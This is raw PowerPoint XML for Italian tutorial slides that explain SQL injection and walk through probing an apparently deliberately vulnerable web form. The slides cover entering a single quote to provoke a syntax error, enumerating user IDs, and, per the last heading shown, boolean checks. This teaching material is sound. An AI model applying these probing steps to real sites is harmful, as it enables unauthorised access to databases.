                <a:t>utilizzati da un’applicazione </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Bold"/>
                </a:rPr>
                <a:t>Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>. Questa tipologia di attacco ha impatti negativi enormi sui siti web</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3359"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3359"/>
                </a:lnSpc>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>La prima cosa che bisogna fare è identificare un injection point (punto di iniezione) dove poi si può costruire il payload per modificare la query dinamica.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3359"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3359"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-7411260">
            <a:off x="8027084" y="-3615482"/>
            <a:ext cx="16623526" cy="15917026"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="15917026" w="16623526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16623526" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16623526" y="15917026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15917026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="402432" y="7832259"/>
            <a:ext cx="17483137" cy="25107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Roboto Condensed"/>
              </a:rPr>
              <a:t>Nella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>sicurezza informatica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> SQL injection è una tecnica di command injection, usata per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:hlinkClick r:id="rId3" tooltip="https://it.wikipedia.org/wiki/Attacco_informatico"/>
              </a:rPr>
              <a:t>attaccare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> applicazioni che gestiscono dati attrav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>erso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>database relazionali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> sfruttando il linguaggio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>. Il mancato controllo dell'input dell'utente permette di inserire artificiosamente delle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:hlinkClick r:id="rId4" tooltip="https://it.wikipedia.org/wiki/Stringa_(informatica)"/>
              </a:rPr>
              <a:t>stringhe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
                <a:hlinkClick r:id="rId5" tooltip="https://it.wikipedia.org/wiki/Codice_sorgente"/>
              </a:rPr>
              <a:t>codice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
                <a:hlinkClick r:id="rId6" tooltip="https://it.wikipedia.org/wiki/SQL"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>che saranno eseguite dall'applicazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>: grazie a questo meccanismo è possibile far eseguire comandi SQL, anche molto complessi, dall'alterazione dei dati (es. creazione di nuovi utenti) al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>completo dei contenuti nel database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8478230" y="1983536"/>
            <a:ext cx="7699536" cy="376809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Roboto Condensed"/>
              </a:rPr>
              <a:t>Sfrutta le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>vulnerabilità di sicurezza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> del codice applicativo che si collega alla fonte dati SQL, ad esempio, sfruttando il mancato filtraggio dell'input dell'utente (es. 'caratteri di escape' nelle stringhe SQL) oppure la mancata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>tipizzazione forte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> delle variabili impiegate. È più conosciuto come attacco destinato ad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>applicazioni web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>, ma è anche usato per attaccare qualsiasi altro tipo di applicazione che impieghi in modo non sicuro database SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="33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34861" y="3317874"/>
            <a:ext cx="6036425" cy="83439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Roboto Condensed"/>
              </a:rPr>
              <a:t>Andiamo nella pagina delle SQL Injection in modo da visualizzare il form.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="2189548">
            <a:off x="13138077" y="-3516259"/>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8065191" y="3062837"/>
            <a:ext cx="8368381" cy="1796741"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1796741" w="8368381">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8368381" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8368381" y="1796740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1796740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="777180" y="8488516"/>
            <a:ext cx="16457833" cy="519189"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="519189" w="16457833">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16457833" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16457833" y="519189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="519189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="-2024" r="-179" b="-133099"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="777180" y="390376"/>
            <a:ext cx="6751787" cy="1914525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7519"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6266">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6266">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t> Pagina SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3006967" y="7014353"/>
            <a:ext cx="11418947" cy="8343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Roboto Condensed"/>
              </a:rPr>
              <a:t>Proviamo ad inserire una variabile tipo “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> “ nella barra di ricerca e subito vediamo l’errore della sintassi del SQL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016928" y="-1482035"/>
            <a:ext cx="16623526" cy="15917026"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="15917026" w="16623526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16623526" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16623526" y="15917025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15917025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="7796088" y="1028700"/>
            <a:ext cx="4652640" cy="2422523"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2422523" w="4652640">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4652641" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4652641" y="2422523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2422523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-77942" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12966785" y="1028700"/>
            <a:ext cx="4677310" cy="2440008"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2440008" w="4677310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4677310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4677310" y="2440008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2440008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-77004" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="7771419" y="4123594"/>
            <a:ext cx="4677310" cy="2377888"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2377888" w="4677310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4677310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4677310" y="2377888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2377888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-77004" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12966785" y="4123594"/>
            <a:ext cx="4879041" cy="2347874"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2347874" w="4879041">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4879041" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4879041" y="2347874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2347874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="-2436" r="-29161" b="-6032"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10719331" y="6949157"/>
            <a:ext cx="4494909" cy="2513212"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2513212" w="4494909">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4494908" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4494908" y="2513211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2513211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-36523" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="777180" y="380851"/>
            <a:ext cx="8366820" cy="1619365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="6317"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5264">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5264">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t> Prove di inserimento Variabile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="777180" y="2934333"/>
            <a:ext cx="6337062" cy="8343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Roboto Condensed"/>
              </a:rPr>
              <a:t>Effettuiamo delle prove per vedere i risultati e le sintassi accettate dal database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2165535" y="7530956"/>
            <a:ext cx="6978465" cy="8343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Roboto Condensed"/>
              </a:rPr>
              <a:t>Abbiamo dei risultati inserendo i numeri da 1 a 5, che corrispondono ai 5 user ID presenti nel DB</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9548">
            <a:off x="4059542" y="-16650669"/>
            <a:ext cx="19961764" cy="19113389"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="19113389" w="19961764">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19961764" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19961764" y="19113388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19113388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="79000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11239484" y="1729135"/>
            <a:ext cx="4264156" cy="4672202"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4672202" w="4264156">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4264156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4264156" y="4672202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4672202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-74006" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="777180" y="380851"/>
            <a:ext cx="8366820" cy="1619365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="6317"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5264">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5264">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t> Verifica della variabile booleana</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
